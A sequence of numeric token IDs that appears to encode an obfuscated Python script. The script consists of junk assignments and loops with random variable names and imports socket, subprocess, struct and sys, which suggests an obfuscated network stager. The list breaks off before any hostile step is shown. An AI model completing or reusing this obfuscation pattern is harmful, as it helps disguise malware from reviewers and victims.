2117,
77,
1581,
2025,
5222,
57,
16045,
33,
89,
6,
198,
89,
76,
8575,
89,
85,
17511,
84,
40,
6369,
44602,
15199,
83,
38,
83,
5222,
8416,
79,
32,
48,
20802,
85,
89,
82,
1546,
48,
44,
86,
21713,
56,
37,
88,
38,
48,
88,
36,
10526,
16635,
9655,
4503,
37,
5662,
49,
1503,
2200,
76,
50,
796,
705,
41132,
36299,
86,
45,
74,
8220,
80,
6836,
39,
87,
39,
45113,
86,
73,
6535,
41,
8141,
71,
39,
6968,
72,
49,
57,
20802,
89,
81,
37,
2043,
89,
3697,
76,
57,
26009,
5631,
84,
11473,
83,
32,
742,
74,
48,
89,
35,
52,
84,
38,
70,
6,
198,
87,
41,
38208,
11163,
35,
75,
76,
80,
76,
40797,
11909,
81,
35,
20120,
41,
6173,
4851,
414,
76,
37,
53,
48,
44179,
26001,
37,
11012,
33,
86,
47,
86,
11473,
81,
6217,
86,
1199,
84,
40,
29567,
39,
41,
48382,
34,
4579,
70,
796,
705,
49,
75,
48,
80,
9399,
88,
48,
45,
22707,
3528,
78,
44602,
80,
8068,
40,
78,
57,
48,
6080,
73,
18564,
15199,
1503,
39,
5606,
47,
14529,
88,
49,
37020,
85,
38,
80,
70,
56,
41,
14981,
87,
16309,
19416,
81,
50,
18878,
86,
80,
40,
6,
198,
83,
7278,
40,
8903,
41,
86,
36820,
48624,
41,
80,
44602,
12038,
87,
1921,
45895,
421,
88,
38,
41,
73,
48,
2969,
85,
35990,
9792,
74,
56,
67,
10987,
39816,
89,
12473,
2969,
78,
2200,
87,
89,
37,
41,
87,
49,
41,
55,
41,
796,
705,
49,
80,
19238,
86,
56,
6322,
16412,
3109,
37,
29567,
7556,
89,
48,
41,
73,
74,
41,
86,
3109,
32,
78,
6242,
48,
34,
57,
85,
55,
5432,
81,
34,
69,
5639,
282,
41,
36,
3109,
85,
3539,
46,
89,
16879,
88,
85,
87,
89,
10116,
88,
6,
198,
41,
37094,
4303,
36982,
42388,
5064,
2238,
89,
81,
55,
82,
53,
42646,
84,
7397,
30488,
38,
76,
40914,
32,
41,
43,
39,
15766,
41,
48,
45,
55,
1820,
86,
46,
89,
27353,
7112,
80,
67,
86,
39,
69,
7801,
13024,
24723,
71,
66,
39,
796,
705,
3398,
3546,
78,
20114,
88,
50,
10652,
15112,
85,
74,
79,
46,
88,
5840,
10277,
33,
7792,
89,
86,
1921,
47,
3808,
48,
32274,
34,
80,
27305,
46,
86,
13940,
44802,
39,
79,
48192,
10503,
41,
1921,
84,
38,
73,
30386,
53,
48,
55,
77,
6,
198,
17184,
2417,
80,
46,
912,
4464,
16501,
32886,
89,
49,
4462,
81,
80,
2257,
2200,
77,
87,
77,
57,
38374,
17931,
86,
39,
3109,
86,
44817,
32298,
1137,
41,
5308,
3539,
32886,
87,
32,
2290,
2417,
85,
4834,
44802,
742,
796,
705,
41,
4579,
7707,
84,
49215,
11909,
56,
4462,
37,
48,
89,
26009,
7156,
2043,
9792,
73,
83,
47,
5837,
41133,
6369,
11994,
39,
41,
48,
10761,
48,
86,
85,
48,
3705,
49345,
78,
80,
55,
2943,
80,
48,
80,
8859,
20739,
43021,
6,
198,
361,
376,
73,
42336,
83,
6173,
41,
17602,
48,
40,
7399,
16045,
33,
1565,
88,
85,
50,
8068,
69,
74,
39,
4090,
78,
42413,
3019,
3886,
34,
48,
34,
22877,
36,
48,
32618,
7156,
89,
83,
39,
4561,
49079,
76,
3539,
73,
33,
41,
5777,
14512,
256,
7278,
40,
8903,
41,
86,
36820,
48624,
41,
80,
44602,
12038,
87,
1921,
45895,
421,
88,
38,
41,
73,
48,
2969,
85,
35990,
9792,
74,
56,
67,
10987,
39816,
89,
12473,
2969,
78,
2200,
87,
89,
37,
41,
87,
49,
41,
55,
41,
25,
198,
220,
220,
220,
1976,
76,
8575,
89,
85,
17511,
84,
40,
6369,
44602,
15199,
83,
38,
83,
5222,
8416,
79,
32,
48,
20802,
85,
89,
82,
1546,
48,
44,
86,
21713,
56,
37,
88,
38,
48,
88,
36,
10526,
16635,
9655,
4503,
37,
5662,
49,
1503,
2200,
76,
50,
796,
2124,
41,
38208,
11163,
35,
75,
76,
80,
76,
40797,
11909,
81,
35,
20120,
41,
6173,
4851,
414,
76,
37,
53,
48,
44179,
26001,
37,
11012,
33,
86,
47,
86,
11473,
81,
6217,
86,
1199,
84,
40,
29567,
39,
41,
48382,
34,
4579,
70,
198,
220,
220,
220,
329,
15172,
2417,
80,
46,
912,
4464,
16501,
32886,
89,
49,
4462,
81,
80,
2257,
2200,
77,
87,
77,
57,
38374,
17931,
86,
39,
3109,
86,
44817,
32298,
1137,
41,
5308,
3539,
32886,
87,
32,
2290,
2417,
85,
4834,
44802,
742,
287,
256,
7278,
40,
8903,
41,
86,
36820,
48624,
41,
80,
44602,
12038,
87,
1921,
45895,
421,
88,
38,
41,
73,
48,
2969,
85,
35990,
9792,
74,
56,
67,
10987,
39816,
89,
12473,
2969,
78,
2200,
87,
89,
37,
41,
87,
49,
41,
55,
41,
25,
198,
220,
220,
220,
220,
220,
220,
220,
611,
15172,
2417,
80,
46,
912,
4464,
16501,
32886,
89,
49,
4462,
81,
80,
2257,
2200,
77,
87,
77,
57,
38374,
17931,
86,
39,
3109,
86,
44817,
32298,
1137,
41,
5308,
3539,
32886,
87,
32,
2290,
2417,
85,
4834,
44802,
742,
14512,
2124,
41,
38208,
11163,
35,
75,
76,
80,
76,
40797,
11909,
81,
35,
20120,
41,
6173,
4851,
414,
76,
37,
53,
48,
44179,
26001,
37,
11012,
33,
86,
47,
86,
11473,
81,
6217,
86,
1199,
84,
40,
29567,
39,
41,
48382,
34,
4579,
70,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1976,
76,
8575,
89,
85,
17511,
84,
40,
6369,
44602,
15199,
83,
38,
83,
5222,
8416,
79,
32,
48,
20802,
85,
89,
82,
1546,
48,
44,
86,
21713,
56,
37,
88,
38,
48,
88,
36,
10526,
16635,
9655,
4503,
37,
5662,
49,
1503,
2200,
76,
50,
796,
1976,
76,
8575,
89,
85,
17511,
84,
40,
6369,
44602,
15199,
83,
38,
83,
5222,
8416,
79,
32,
48,
20802,
85,
89,
82,
1546,
48,
44,
86,
21713,
56,
37,
88,
38,
48,
88,
36,
10526,
16635,
9655,
4503,
37,
5662,
49,
1503,
2200,
76,
50,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
449,
37094,
4303,
36982,
42388,
5064,
2238,
89,
81,
55,
82,
53,
42646,
84,
7397,
30488,
38,
76,
40914,
32,
41,
43,
39,
15766,
41,
48,
45,
55,
1820,
86,
46,
89,
27353,
7112,
80,
67,
86,
39,
69,
7801,
13024,
24723,
71,
66,
39,
796,
376,
73,
42336,
83,
6173,
41,
17602,
48,
40,
7399,
16045,
33,
1565,
88,
85,
50,
8068,
69,
74,
39,
4090,
78,
42413,
3019,
3886,
34,
48,
34,
22877,
36,
48,
32618,
7156,
89,
83,
39,
4561,
49079,
76,
3539,
73,
33,
41,
5777,
198,
17772,
25,
198,
220,
220,
220,
2124,
41,
38208,
11163,
35,
75,
76,
80,
76,
40797,
11909,
81,
35,
20120,
41,
6173,
4851,
414,
76,
37,
53,
48,
44179,
26001,
37,
11012,
33,
86,
47,
86,
11473,
81,
6217,
86,
1199,
84,
40,
29567,
39,
41,
48382,
34,
4579,
70,
796,
376,
73,
42336,
83,
6173,
41,
17602,
48,
40,
7399,
16045,
33,
1565,
88,
85,
50,
8068,
69,
74,
39,
4090,
78,
42413,
3019,
3886,
34,
48,
34,
22877,
36,
48,
32618,
7156,
89,
83,
39,
4561,
49079,
76,
3539,
73,
33,
41,
5777,
198,
220,
220,
220,
376,
73,
42336,
83,
6173,
41,
17602,
48,
40,
7399,
16045,
33,
1565,
88,
85,
50,
8068,
69,
74,
39,
4090,
78,
42413,
3019,
3886,
34,
48,
34,
22877,
36,
48,
32618,
7156,
89,
83,
39,
4561,
49079,
76,
3539,
73,
33,
41,
5777,
796,
449,
37094,
4303,
36982,
42388,
5064,
2238,
89,
81,
55,
82,
53,
42646,
84,
7397,
30488,
38,
76,
40914,
32,
41,
43,
39,
15766,
41,
48,
45,
55,
1820,
86,
46,
89,
27353,
7112,
80,
67,
86,
39,
69,
7801,
13024,
24723,
71,
66,
39,
198,
220,
220,
220,
611,
2124,
41,
38208,
11163,
35,
75,
76,
80,
76,
40797,
11909,
81,
35,
20120,
41,
6173,
4851,
414,
76,
37,
53,
48,
44179,
26001,
37,
11012,
33,
86,
47,
86,
11473,
81,
6217,
86,
1199,
84,
40,
29567,
39,
41,
48382,
34,
4579,
70,
6624,
376,
73,
42336,
83,
6173,
41,
17602,
48,
40,
7399,
16045,
33,
1565,
88,
85,
50,
8068,
69,
74,
39,
4090,
78,
42413,
3019,
3886,
34,
48,
34,
22877,
36,
48,
32618,
7156,
89,
83,
39,
4561,
49079,
76,
3539,
73,
33,
41,
5777,
25,
198,
220,
220,
220,
220,
220,
220,
220,
329,
15172,
2417,
80,
46,
912,
4464,
16501,
32886,
89,
49,
4462,
81,
80,
2257,
2200,
77,
87,
77,
57,
38374,
17931,
86,
39,
3109,
86,
44817,
32298,
1137,
41,
5308,
3539,
32886,
87,
32,
2290,
2417,
85,
4834,
44802,
742,
287,
376,
73,
42336,
83,
6173,
41,
17602,
48,
40,
7399,
16045,
33,
1565,
88,
85,
50,
8068,
69,
74,
39,
4090,
78,
42413,
3019,
3886,
34,
48,
34,
22877,
36,
48,
32618,
7156,
89,
83,
39,
4561,
49079,
76,
3539,
73,
33,
41,
5777,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
15172,
2417,
80,
46,
912,
4464,
16501,
32886,
89,
49,
4462,
81,
80,
2257,
2200,
77,
87,
77,
57,
38374,
17931,
86,
39,
3109,
86,
44817,
32298,
1137,
41,
5308,
3539,
32886,
87,
32,
2290,
2417,
85,
4834,
44802,
742,
6624,
2124,
41,
38208,
11163,
35,
75,
76,
80,
76,
40797,
11909,
81,
35,
20120,
41,
6173,
4851,
414,
76,
37,
53,
48,
44179,
26001,
37,
11012,
33,
86,
47,
86,
11473,
81,
6217,
86,
1199,
84,
40,
29567,
39,
41,
48382,
34,
4579,
70,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2124,
41,
38208,
11163,
35,
75,
76,
80,
76,
40797,
11909,
81,
35,
20120,
41,
6173,
4851,
414,
76,
37,
53,
48,
44179,
26001,
37,
11012,
33,
86,
47,
86,
11473,
81,
6217,
86,
1199,
84,
40,
29567,
39,
41,
48382,
34,
4579,
70,
796,
376,
73,
42336,
83,
6173,
41,
17602,
48,
40,
7399,
16045,
33,
1565,
88,
85,
50,
8068,
69,
74,
39,
4090,
78,
42413,
3019,
3886,
34,
48,
34,
22877,
36,
48,
32618,
7156,
89,
83,
39,
4561,
49079,
76,
3539,
73,
33,
41,
5777,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2124,
41,
38208,
11163,
35,
75,
76,
80,
76,
40797,
11909,
81,
35,
20120,
41,
6173,
4851,
414,
76,
37,
53,
48,
44179,
26001,
37,
11012,
33,
86,
47,
86,
11473,
81,
6217,
86,
1199,
84,
40,
29567,
39,
41,
48382,
34,
4579,
70,
796,
449,
37094,
4303,
36982,
42388,
5064,
2238,
89,
81,
55,
82,
53,
42646,
84,
7397,
30488,
38,
76,
40914,
32,
41,
43,
39,
15766,
41,
48,
45,
55,
1820,
86,
46,
89,
27353,
7112,
80,
67,
86,
39,
69,
7801,
13024,
24723,
71,
66,
39,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
32,
22556,
41,
45,
5211,
4760,
20185,
27155,
10872,
36,
14529,
6998,
82,
38374,
34,
48,
47247,
80,
11901,
65,
4715,
3792,
48,
268,
38,
89,
67,
34,
33018,
12562,
1722,
36133,
42421,
28747,
17184,
87,
45,
13909,
41,
796,
705,
34788,
37,
89,
85,
48802,
79,
89,
40,
86,
48,
89,
46265,
38475,
42,
37,
88,
36,
32886,
76,
36,
9360,
6173,
49,
2389,
81,
16458,
38,
7801,
4507,
49,
85,
50,
89,
41,
83,
11682,
56,
4061,
41,
17250,
8763,
87,
81,
53,
9865,
37,
6,
198,
9861,
3398,
69,
9865,
84,
38,
79,
41473,
86,
49,
57,
33,
5631,
41,
9139,
36,
32178,
40939,
48,
85,
34,
9908,
80,
74,
39,
80,
53,
53,
316,
34,
4464,
32,
20120,
85,
39776,
48,
67,
36,
1546,
12473,
85,
77,
37,
80,
56,
29992,
796,
705,
73,
47,
5324,
89,
53,
37659,
40469,
88,
66,
38,
87,
14313,
33,
83,
39,
2969,
8035,
49,
72,
41,
20418,
51,
70,
41,
37,
20895,
10761,
35,
86,
73,
19238,
36056,
5631,
71,
47,
84,
36208,
83,
36,
89,
32,
48,
73,
77,
3978,
39,
80,
55,
73,
6,
198,
361,
13709,
88,
41,
45,
5211,
4760,
20185,
27155,
10872,
36,
14529,
6998,
82,
38374,
34,
48,
47247,
80,
11901,
65,
4715,
3792,
48,
268,
38,
89,
67,
34,
33018,
12562,
1722,
36133,
42421,
28747,
17184,
87,
45,
13909,
41,
14512,
2671,
3398,
69,
9865,
84,
38,
79,
41473,
86,
49,
57,
33,
5631,
41,
9139,
36,
32178,
40939,
48,
85,
34,
9908,
80,
74,
39,
80,
53,
53,
316,
34,
4464,
32,
20120,
85,
39776,
48,
67,
36,
1546,
12473,
85,
77,
37,
80,
56,
29992,
25,
198,
220,
220,
220,
13709,
88,
41,
45,
5211,
4760,
20185,
27155,
10872,
36,
14529,
6998,
82,
38374,
34,
48,
47247,
80,
11901,
65,
4715,
3792,
48,
268,
38,
89,
67,
34,
33018,
12562,
1722,
36133,
42421,
28747,
17184,
87,
45,
13909,
41,
796,
705,
73,
47,
5324,
89,
53,
37659,
40469,
88,
66,
38,
87,
14313,
33,
83,
39,
2969,
8035,
49,
72,
41,
20418,
51,
70,
41,
37,
20895,
10761,
35,
86,
73,
19238,
36056,
5631,
71,
47,
84,
36208,
83,
36,
89,
32,
48,
73,
77,
3978,
39,
80,
55,
73,
6,
198,
220,
220,
220,
2671,
3398,
69,
9865,
84,
38,
79,
41473,
86,
49,
57,
33,
5631,
41,
9139,
36,
32178,
40939,
48,
85,
34,
9908,
80,
74,
39,
80,
53,
53,
316,
34,
4464,
32,
20120,
85,
39776,
48,
67,
36,
1546,
12473,
85,
77,
37,
80,
56,
29992,
796,
13709,
88,
41,
45,
5211,
4760,
20185,
27155,
10872,
36,
14529,
6998,
82,
38374,
34,
48,
47247,
80,
11901,
65,
4715,
3792,
48,
268,
38,
89,
67,
34,
33018,
12562,
1722,
36133,
42421,
28747,
17184,
87,
45,
13909,
41,
198,
220,
220,
220,
13709,
88,
41,
45,
5211,
4760,
20185,
27155,
10872,
36,
14529,
6998,
82,
38374,
34,
48,
47247,
80,
11901,
65,
4715,
3792,
48,
268,
38,
89,
67,
34,
33018,
12562,
1722,
36133,
42421,
28747,
17184,
87,
45,
13909,
41,
796,
705,
34788,
37,
89,
85,
48802,
79,
89,
40,
86,
48,
89,
46265,
38475,
42,
37,
88,
36,
32886,
76,
36,
9360,
6173,
49,
2389,
81,
16458,
38,
7801,
4507,
49,
85,
50,
89,
41,
83,
11682,
56,
4061,
41,
17250,
8763,
87,
81,
53,
9865,
37,
6,
198,
11748,
17802,
198,
80,
50,
6535,
52,
3528,
2417,
81,
89,
22778,
5606,
38,
1837,
85,
54,
44817,
16115,
41,
11122,
44,
10547,
1834,
12889,
77,
32,
3792,
21095,
39,
83,
8141,
40,
79,
25425,
79,
452,
75,
52,
45579,
10246,
46,
40,
74,
16045,
796,
705,
81,
79,
40,
88,
41473,
45113,
57,
34,
66,
41,
38,
2246,
89,
16630,
52,
73,
46,
73,
39,
32179,
38,
87,
89,
38,
5258,
4464,
38584,
48,
5777,
82,
87,
33,
73,
39,
41,
1565,
2202,
87,
18429,
2025,
35,
8642,
2943,
14246,
37,
70,
35,
6,
198,
46,
41,
77,
43,
41,
9419,
22556,
40,
80,
14761,
89,
82,
38,
80,
86,
46,
4948,
85,
49,
1921,
70,
301,
38,
9693,
20760,
49,
40914,
6187,
6187,
35,
86,
14242,
17184,
81,
79,
4730,
33,
77,
69,
48,
46987,
11584,
89,
47,
89,
85,
796,
705,
81,
25425,
17602,
3886,
44,
89,
5431,
5432,
80,
79,
38,
6836,
14082,
1503,
41,
45,
17213,
4537,
25374,
85,
12473,
28391,
89,
41,
27353,
5258,
5777,
14304,
48,
56,
89,
4805,
84,
46,
41,
85,
18564,
83,
11230,
36,
40,
74,
34,
6,
198,
21713,
56,
48,
47,
80,
79,
25690,
84,
45113,
87,
53,
84,
49,
6089,
88,
8859,
41,
48,
87,
50,
4061,
43538,
27624,
4663,
39,
7340,
33704,
50,
82,
50,
2704,
57,
73,
46,
85,
4669,
50,
82,
40,
88,
53,
80,
87,
48,
87,
78,
11190,
54,
73,
796,
705,
55,
35,
77,
49,
87,
41,
2417,
12310,
72,
35,
3020,
6500,
48,
79,
86,
66,
35257,
7357,
15996,
3546,
4503,
8226,
89,
49345,
25425,
47858,
10227,
38,
77,
37,
41,
7998,
38,
87,
14795,
17034,
84,
47,
7357,
23852,
48,
24160,
89,
6,
198,
361,
10662,
50,
6535,
52,
3528,
2417,
81,
89,
22778,
5606,
38,
1837,
85,
54,
44817,
16115,
41,
11122,
44,
10547,
1834,
12889,
77,
32,
3792,
21095,
39,
83,
8141,
40,
79,
25425,
79,
452,
75,
52,
45579,
10246,
46,
40,
74,
16045,
6624,
440,
41,
77,
43,
41,
9419,
22556,
40,
80,
14761,
89,
82,
38,
80,
86,
46,
4948,
85,
49,
1921,
70,
301,
38,
9693,
20760,
49,
40914,
6187,
6187,
35,
86,
14242,
17184,
81,
79,
4730,
33,
77,
69,
48,
46987,
11584,
89,
47,
89,
85,
25,
198,
220,
220,
220,
34977,
56,
48,
47,
80,
79,
25690,
84,
45113,
87,
53,
84,
49,
6089,
88,
8859,
41,
48,
87,
50,
4061,
43538,
27624,
4663,
39,
7340,
33704,
50,
82,
50,
2704,
57,
73,
46,
85,
4669,
50,
82,
40,
88,
53,
80,
87,
48,
87,
78,
11190,
54,
73,
796,
705,
55,
35,
77,
49,
87,
41,
2417,
12310,
72,
35,
3020,
6500,
48,
79,
86,
66,
35257,
7357,
15996,
3546,
4503,
8226,
89,
49345,
25425,
47858,
10227,
38,
77,
37,
41,
7998,
38,
87,
14795,
17034,
84,
47,
7357,
23852,
48,
24160,
89,
6,
198,
220,
220,
220,
34977,
56,
48,
47,
80,
79,
25690,
84,
45113,
87,
53,
84,
49,
6089,
88,
8859,
41,
48,
87,
50,
4061,
43538,
27624,
4663,
39,
7340,
33704,
50,
82,
50,
2704,
57,
73,
46,
85,
4669,
50,
82,
40,
88,
53,
80,
87,
48,
87,
78,
11190,
54,
73,
796,
10662,
50,
6535,
52,
3528,
2417,
81,
89,
22778,
5606,
38,
1837,
85,
54,
44817,
16115,
41,
11122,
44,
10547,
1834,
12889,
77,
32,
3792,
21095,
39,
83,
8141,
40,
79,
25425,
79,
452,
75,
52,
45579,
10246,
46,
40,
74,
16045,
198,
17772,
25,
198,
220,
220,
220,
34977,
56,
48,
47,
80,
79,
25690,
84,
45113,
87,
53,
84,
49,
6089,
88,
8859,
41,
48,
87,
50,
4061,
43538,
27624,
4663,
39,
7340,
33704,
50,
82,
50,
2704,
57,
73,
46,
85,
4669,
50,
82,
40,
88,
53,
80,
87,
48,
87,
78,
11190,
54,
73,
796,
705,
55,
35,
77,
49,
87,
41,
2417,
12310,
72,
35,
3020,
6500,
48,
79,
86,
66,
35257,
7357,
15996,
3546,
4503,
8226,
89,
49345,
25425,
47858,
10227,
38,
77,
37,
41,
7998,
38,
87,
14795,
17034,
84,
47,
7357,
23852,
48,
24160,
89,
6,
198,
220,
220,
220,
34977,
56,
48,
47,
80,
79,
25690,
84,
45113,
87,
53,
84,
49,
6089,
88,
8859,
41,
48,
87,
50,
4061,
43538,
27624,
4663,
39,
7340,
33704,
50,
82,
50,
2704,
57,
73,
46,
85,
4669,
50,
82,
40,
88,
53,
80,
87,
48,
87,
78,
11190,
54,
73,
796,
705,
81,
79,
40,
88,
41473,
45113,
57,
34,
66,
41,
38,
2246,
89,
16630,
52,
73,
46,
73,
39,
32179,
38,
87,
89,
38,
5258,
4464,
38584,
48,
5777,
82,
87,
33,
73,
39,
41,
1565,
2202,
87,
18429,
2025,
35,
8642,
2943,
14246,
37,
70,
35,
6,
198,
11748,
850,
14681,
198,
20120,
89,
7902,
35,
8845,
41,
2389,
4948,
80,
77,
48,
13940,
46,
45006,
89,
70,
55,
280,
41,
89,
47,
89,
6968,
4561,
49,
24928,
4303,
88,
34,
68,
33,
16960,
89,
69,
41,
36,
89,
48,
303,
44,
83,
41,
41133,
35416,
44,
80,
796,
705,
14246,
34,
79,
42149,
39,
5812,
46,
2601,
6080,
48,
6242,
48,
47,
87,
17887,
76,
40469,
1026,
81,
35,
3727,
38,
429,
57,
86,
41,
36,
83,
32298,
41,
40,
79,
55,
46,
86,
5324,
9139,
34,
41,
47322,
33,
48,
929,
86,
33,
86,
6,
198,
84,
50,
280,
2601,
21533,
84,
86,
25297,
47,
41,
57,
42,
53,
32178,
41,
9697,
55,
49,
81,
315,
2640,
72,
48,
4090,
86,
53,
81,
34,
86,
48,
80,
10305,
74,
87,
36,
74,
22182,
76,
38,
80,
48,
71,
49,
32178,
1797,
77,
50,
41,
87,
47,
796,
705,
14795,
10305,
48,
11012,
8264,
29499,
80,
2584,
42336,
20471,
10913,
80,
35,
44802,
2640,
49,
5439,
39,
69,
10761,
65,
41,
87,
43421,
86,
6187,
16402,
72,
12303,
86,
54,
88,
8141,
6732,
8476,
84,
9697,
26708,
85,
87,
6,
198,
361,
26755,
89,
7902,
35,
8845,
41,
2389,
4948,
80,
77,
48,
13940,
46,
45006,
89,
70,
55,
280,
41,
89,
47,
89,
6968,
4561,
49,
24928,
4303,
88,
34,
68,
33,
16960,
89,
69,
41,
36,
89,
48,
303,
44,
83,
41,
41133,
35416,
44,
80,
14512,
334,
50,
280,
2601,
21533,
84,
86,
25297,
47,
41,
57,
42,
53,
32178,
41,
9697,
55,
49,
81,
315,
2640,
72,
48,
4090,
86,
53,
81,
34,
86,
48,
80,
10305,
74,
87,
36,
74,
22182,
76,
38,
80,
48,
71,
49,
32178,
1797,
77,
50,
41,
87,
47,
25,
198,
220,
220,
220,
26755,
89,
7902,
35,
8845,
41,
2389,
4948,
80,
77,
48,
13940,
46,
45006,
89,
70,
55,
280,
41,
89,
47,
89,
6968,
4561,
49,
24928,
4303,
88,
34,
68,
33,
16960,
89,
69,
41,
36,
89,
48,
303,
44,
83,
41,
41133,
35416,
44,
80,
796,
705,
14795,
10305,
48,
11012,
8264,
29499,
80,
2584,
42336,
20471,
10913,
80,
35,
44802,
2640,
49,
5439,
39,
69,
10761,
65,
41,
87,
43421,
86,
6187,
16402,
72,
12303,
86,
54,
88,
8141,
6732,
8476,
84,
9697,
26708,
85,
87,
6,
198,
220,
220,
220,
334,
50,
280,
2601,
21533,
84,
86,
25297,
47,
41,
57,
42,
53,
32178,
41,
9697,
55,
49,
81,
315,
2640,
72,
48,
4090,
86,
53,
81,
34,
86,
48,
80,
10305,
74,
87,
36,
74,
22182,
76,
38,
80,
48,
71,
49,
32178,
1797,
77,
50,
41,
87,
47,
796,
26755,
89,
7902,
35,
8845,
41,
2389,
4948,
80,
77,
48,
13940,
46,
45006,
89,
70,
55,
280,
41,
89,
47,
89,
6968,
4561,
49,
24928,
4303,
88,
34,
68,
33,
16960,
89,
69,
41,
36,
89,
48,
303,
44,
83,
41,
41133,
35416,
44,
80,
198,
220,
220,
220,
26755,
89,
7902,
35,
8845,
41,
2389,
4948,
80,
77,
48,
13940,
46,
45006,
89,
70,
55,
280,
41,
89,
47,
89,
6968,
4561,
49,
24928,
4303,
88,
34,
68,
33,
16960,
89,
69,
41,
36,
89,
48,
303,
44,
83,
41,
41133,
35416,
44,
80,
796,
705,
14246,
34,
79,
42149,
39,
5812,
46,
2601,
6080,
48,
6242,
48,
47,
87,
17887,
76,
40469,
1026,
81,
35,
3727,
38,
429,
57,
86,
41,
36,
83,
32298,
41,
40,
79,
55,
46,
86,
5324,
9139,
34,
41,
47322,
33,
48,
929,
86,
33,
86,
6,
198,
11748,
2878,
198,
41,
4462,
2538,
47,
3861,
85,
48,
8579,
49,
528,
27912,
42,
5222,
35755,
381,
38,
20120,
41,
37,
25374,
79,
21217,
10080,
52,
1140,
18429,
40,
73,
83,
55,
1026,
66,
50,
89,
41,
26903,
26691,
86,
23852,
80,
6535,
912,
796,
705,
42,
33707,
47,
41,
26377,
4503,
5211,
6849,
76,
49345,
38,
48,
33018,
16309,
80,
77,
7708,
39,
75,
46,
1273,
89,
82,
3886,
78,
53,
84,
48,
73,
11401,
85,
37,
315,
77,
7355,
48,
35,
89,
4061,
11190,
40,
4507,
1546,
87,
89,
6,
198,
23013,
9908,
1268,
10462,
14529,
83,
43,
39,
8141,
1961,
42598,
9693,
41,
85,
38,
85,
10246,
39,
721,
14242,
19767,
32,
73,
80,
74,
80,
1921,
46,
22556,
3398,
87,
89,
38,
5258,
38475,
86,
39,
85,
31554,
8264,
48,
86,
796,
705,
14246,
33,
39,
14396,
41,
10917,
2704,
89,
8141,
74,
2396,
19591,
6322,
79,
2246,
67,
48,
37,
34369,
50,
48,
57,
19260,
33863,
41,
34278,
3546,
23013,
5247,
3978,
71,
18276,
88,
47,
29499,
89,
55,
84,
1219,
3483,
49,
6,
198,
361,
449,
4462,
2538,
47,
3861,
85,
48,
8579,
49,
528,
27912,
42,
5222,
35755,
381,
38,
20120,
41,
37,
25374,
79,
21217,
10080,
52,
1140,
18429,
40,
73,
83,
55,
1026,
66,
50,
89,
41,
26903,
26691,
86,
23852,
80,
6535,
912,
14512,
267,
72,
9908,
1268,
10462,
14529,
83,
43,
39,
8141,
1961,
42598,
9693,
41,
85,
38,
85,
10246,
39,
721,
14242,
19767,
32,
73,
80,
74,
80,
1921,
46,
22556,
3398,
87,
89,
38,
5258,
38475,
86,
39,
85,
31554,
8264,
48,
86,
25,
198,
220,
220,
220,
449,
4462,
2538,
47,
3861,
85,
48,
8579,
49,
528,
27912,
42,
5222,
35755,
381,
38,
20120,
41,
37,
25374,
79,
21217,
10080,
52,
1140,
18429,
40,
73,
83,
55,
1026,
66,
50,
89,
41,
26903,
26691,
86,
23852,
80,
6535,
912,
796,
705,
14246,
33,
39,
14396,
41,
10917,
2704,
89,
8141,
74,
2396,
19591,
6322,
79,
2246,
67,
48,
37,
34369,
50,
48,
57,
19260,
33863,
41,
34278,
3546,
23013,
5247,
3978,
71,
18276,
88,
47,
29499,
89,
55,
84,
1219,
3483,
49,
6,
198,
220,
220,
220,
267,
72,
9908,
1268,
10462,
14529,
83,
43,
39,
8141,
1961,
42598,
9693,
41,
85,
38,
85,
10246,
39,
721,
14242,
19767,
32,
73,
80,
74,
80,
1921,
46,
22556,
3398,
87,
89,
38,
5258,
38475,
86,
39,
85,
31554,
8264,
48,
86,
796,
449,
4462,
2538,
47,
3861,
85,
48,
8579,
49,
528,
27912,
42,
5222,
35755,
381,
38,
20120,
41,
37,
25374,
79,
21217,
10080,
52,
1140,
18429,
40,
73,
83,
55,
1026,
66,
50,
89,
41,
26903,
26691,
86,
23852,
80,
6535,
912,
198,
220,
220,
220,
449,
4462,
2538,
47,
3861,
85,
48,
8579,
49,
528,
27912,
42,
5222,
35755,
381,
38,
20120,
41,
37,
25374,
79,
21217,
10080,
52,
1140,
18429,
40,
73,
83,
55,
1026,
66,
50,
89,
41,
26903,
26691,
86,
23852,
80,
6535,
912,
796,
705,
42,
33707,
47,
41,
26377,
4503,
5211,
6849,
76,
49345,
38,
48,
33018,
16309,
80,
77,
7708,
39,
75,
46,
1273,
89,
82,
3886,
78,
53,
84,
48,
73,
11401,
85,
37,
315,
77,
7355,
48,
35,
89,
4061,
11190,
40,
4507,
1546,
87,
89,
6,
198,
11748,
25064,
198,
78,
80,
1268,
33,
85,
2749,
84,
80,
57,
2389,
29567,
77,
23266,
50,
7378,
79,
37,
6500,
80,
25922,
89,
33863,
48,
5662,
4246,
20760,
50,
8924,
85,
28747,
37,
2127,
14082,
40469,
48,
81,
73,
4760,
21283,
5574,
38202,
86,
796,
705,
21095,
86,
14313,
1921,
11571,
2749,
89,
41,
48,
622,
23264,
7792,
80,
69,
80,
50110,
38,
48,
69,
49,
349,
84,
3118,
26708,
45,
76,
38,
77,
7730,
4462,
36,
4593,
81,
46,
85,
49,
76,
27912,
64,
1273,
86,
85,
7397,
38729,
6,
198,
38,
67,
85,
55,
69,
40,
1837,
55,
49345,
33018,
23852,
5606,
5222,
37,
69,
55,
87,
89,
83,
34,
80,
10227,
14529,
2389,
53,
73,
74,
2257,
54,
29551,
38,
37882,
87,
21095,
79,
1546,
75,
1921,
47503,
7836,
46,
273,
73,
49,
81,
796,
705,
29499,
89,
35,
80,
23820,
37,
86,
10008,
43221,
80,
15916,
5606,
37,
15766,
89,
76,
35,
2417,
29567,
39,
75,
33,
15548,
5222,
57,
41,
89,
46,
85,
74,
49079,
80,
87,
73,
6089,
1069,
45579,
35,
89,
8035,
27799,
80,
948,
83,
49,
6,
198,
18504,
55,
27891,
33866,
39,
73,
4653,
9419,
82,
39,
85,
37,
5064,
77,
7355,
85,
40,
10277,
49,
87,
21414,
43,
10547,
38,
9598,
